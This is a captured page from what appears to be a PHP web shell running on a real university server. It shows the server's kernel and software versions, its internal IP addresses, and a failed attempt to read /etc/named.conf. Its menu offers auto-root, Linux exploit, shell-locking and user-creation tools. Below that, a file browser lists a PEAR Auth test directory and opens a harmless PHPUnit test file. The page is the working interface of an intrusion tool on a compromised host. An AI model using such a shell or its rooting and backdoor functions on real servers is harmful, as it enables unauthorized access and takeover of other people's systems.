Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Auth /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
AllTests.php
1.14
KB
-rw-r--r--
auth_container_db_options.php
583
B
-rw-r--r--
auth_container_file_options.php
114
B
-rw-r--r--
auth_container_imap_options.php
160
B
-rw-r--r--
auth_container_mdb2_options.php
554
B
-rw-r--r--
auth_container_mdb_options.php
554
B
-rw-r--r--
auth_container_pop3a_options.php
129
B
-rw-r--r--
auth_container_pop3_options.php
165
B
-rw-r--r--
bug8735.passwd
19
B
-rw-r--r--
bug8735.phpt
883
B
-rw-r--r--
DBContainer.php
747
B
-rw-r--r--
DBLiteContainer.php
823
B
-rw-r--r--
FileContainer.php
518
B
-rw-r--r--
IMAPContainer.php
696
B
-rw-r--r--
MDB2Container.php
756
B
-rw-r--r--
MDBContainer.php
820
B
-rw-r--r--
mysql_test_db.sql
163
B
-rw-r--r--
POP3aContainer.php
522
B
-rw-r--r--
POP3Container.php
518
B
-rw-r--r--
TestAuthContainer.php
4.67
KB
-rw-r--r--
tests.php
1.33
KB
-rw-r--r--
users
1
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AllTests.php
<?php if (!defined('PHPUnit_MAIN_METHOD')) { define('PHPUnit_MAIN_METHOD', 'Auth_AllTests::main'); } require_once 'PHPUnit/TextUI/TestRunner.php'; require_once 'DBContainer.php'; require_once 'DBLiteContainer.php'; require_once 'POP3Container.php'; require_once 'POP3aContainer.php'; require_once 'FileContainer.php'; require_once 'MDBContainer.php'; require_once 'MDB2Container.php'; require_once 'IMAPContainer.php'; class Auth_AllTests { public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } public static function suite() { $suite = new PHPUnit_Framework_TestSuite('Auth Tests'); $suite->addTestSuite('DBContainer'); $suite->addTestSuite('MDBContainer'); //$suite->addTestSuite('MBD2Container'); $suite->addTestSuite('DBLiteContainer'); $suite->addTestSuite('POP3Container'); $suite->addTestSuite('POP3aContainer'); $suite->addTestSuite('FileContainer'); $suite->addTestSuite('IMAPContainer'); return $suite; } } // exec test suite if (PHPUnit_MAIN_METHOD == 'Auth_AllTests::main') { Auth_AllTests::main(); } ?>
Close